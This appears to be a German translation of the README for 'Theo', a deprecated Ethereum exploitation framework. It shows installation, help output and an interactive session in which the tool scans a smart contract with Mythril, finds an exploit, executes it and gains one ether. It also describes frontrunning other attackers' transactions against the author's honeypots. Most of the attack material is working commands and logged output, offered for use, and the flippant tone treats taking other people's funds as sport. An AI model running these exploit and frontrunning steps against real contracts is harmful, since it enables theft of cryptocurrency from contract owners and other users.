
Ethereum Recon- und Exploitation-Tool.
Veraltet, wird nicht mehr gewartet, installieren Sie es nicht, verwenden Sie es nicht, Sie wurden gewarnt!
Theo soll ein Exploitation-Framework und ein Werkzeug zur Blockchain-Erkundung und -Interaktion sein.
Funktionen:
Er kennt Karl von der Arbeit.
Theos Zweck ist es, Script-Kiddies zu bekämpfen, die versuchen, leet Hacker zu sein. Er kann ihnen zuhören, wie sie versuchen, seine Honeypots auszunutzen, und sie ihr Geld verlieren lassen, zu seinem eigenen Vorteil.
"Du hast mich nicht wegen meiner charmanten Persönlichkeit mitgenommen."
Theo ist als PyPI-Paket verfügbar:
$ pip install theo
$ theo --help
usage: theo [-h] [--rpc-http RPC_HTTP] [--rpc-ws RPC_WS] [--rpc-ipc RPC_IPC]
[--account-pk ACCOUNT_PK] [--contract ADDRESS]
[--skip-mythril SKIP_MYTHRIL] [--load-file LOAD_FILE] [--version]
Monitor contracts for balance changes or tx pool.
optional arguments:
-h, --help show this help message and exit
--rpc-http RPC_HTTP Connect to this HTTP RPC (default:
http://127.0.0.1:8545)
--account-pk ACCOUNT_PK
The account's private key (default: None)
--contract ADDRESS Contract to monitor (default: None)
--skip-mythril SKIP_MYTHRIL
Don't try to find exploits with Mythril (default:
False)
--load-file LOAD_FILE
Load exploit from file (default: )
--version show program's version number and exit
RPC connections:
--rpc-ws RPC_WS Connect to this WebSockets RPC (default: None)
--rpc-ipc RPC_IPC Connect to this IPC RPC (default: None)
Aus Quellen installieren
$ git clone https://github.com/cleanunicorn/theo
$ cd theo
$ virtualenv ./venv
$ . ./venv/bin/activate
$ pip install -r requirements.txt
$ pip install -e .
$ theo --help
Voraussetzungen:
Einen Smart Contract scannen, Exploits finden, ausnutzen:
Honeypot einrichten, Honeypot bereitstellen, auf Angreifer warten, frontrunnen:
Es ist eine gute Idee, zuerst den Hilfebildschirm zu überprüfen.
$ theo --help
usage: theo [-h] [--rpc-http RPC_HTTP] [--rpc-ws RPC_WS] [--rpc-ipc RPC_IPC]
[--account-pk ACCOUNT_PK] [--contract ADDRESS] [--skip-mythril]
[--load-file LOAD_FILE] [--version]
Monitor contracts for balance changes or tx pool.
optional arguments:
-h, --help show this help message and exit
--rpc-http RPC_HTTP Connect to this HTTP RPC (default:
http://127.0.0.1:8545)
--account-pk ACCOUNT_PK
The account's private key (default: None)
--contract ADDRESS Contract to interact with (default: None)
--skip-mythril Skip scanning the contract with Mythril (default:
False)
--load-file LOAD_FILE
Load exploit from file (default: )
--version show program's version number and exit
RPC connections:
--rpc-ws RPC_WS Connect to this WebSockets RPC (default: None)
--rpc-ipc RPC_IPC Connect to this IPC RPC (default: None)
Eine Liste von Exploits wird automatisch mit mythril identifiziert.
Starten Sie eine Sitzung, indem Sie ausführen:
$ theo --contract=<scanned contract> --account-pk=<your private key>
Scanning for exploits in contract: 0xa586074fa4fe3e546a132a16238abe37951d41fe
Connecting to HTTP: http://127.0.0.1:8545.
Found exploits(s):
[Exploit: (txs=[Transaction {Data: 0xcf7a8965, Value: 1000000000000000000}])]
A few objects are available in the console:
- `exploits` is an array of loaded exploits found by Mythril or read from a file
- `w3` an initialized instance of web3py for the provided HTTP RPC endpoint
Check the readme for more info:
https://github.com/cleanunicorn/theo
>>>
Es wird den Vertrag analysieren und eine Liste verfügbarer Exploits finden.
Sie können die gefundenen verfügbaren Exploits sehen. In diesem Fall wurde ein Exploit gefunden. Jeder Exploit ist ein Exploit-Objekt.
>>> exploits[0]
Exploit: (txs=[Transaction: {'input': '0xcf7a8965', 'value': '0xde0b6b3a7640000'}])
Die Exploit-Schritte können durch Aufruf von .execute() auf dem Exploit-Objekt ausgeführt werden. Die Transaktionen werden signiert und an den Knoten gesendet, mit dem Sie verbunden sind.
>>> exploits[0].execute()
2019-07-22 11:26:12,196 - Sending tx: {'to': '0xA586074FA4Fe3E546A132a16238abe37951D41fE', 'gasPrice': 1, 'gas': 30521, 'value': 1000000000000000000, 'data': '0xcf7a8965', 'nonce': 47}
2019-07-22 11:26:12,200 - Waiting for 0x41b489c78f654cab0b0451fc573010ddb20ee6437cdbf5098b6b03ee1936c33c to be mined...
2019-07-22 11:26:16,337 - Mined
2019-07-22 11:26:16,341 - Initial balance: 1155999450759997797167 (1156.00 ether)
2019-07-22 11:26:16,342 - Final balance: 1156999450759997768901 (1157.00 ether)
Sie können den Frontrunning-Monitor starten, um auf andere Hacker zu lauschen, die versuchen, den Honeypot auszunutzen.
Verwenden Sie .frontrun(), um auf den Exploit zu lauschen, und senden Sie, wenn er gefunden wird, eine Transaktion mit einem höheren Gaspreis.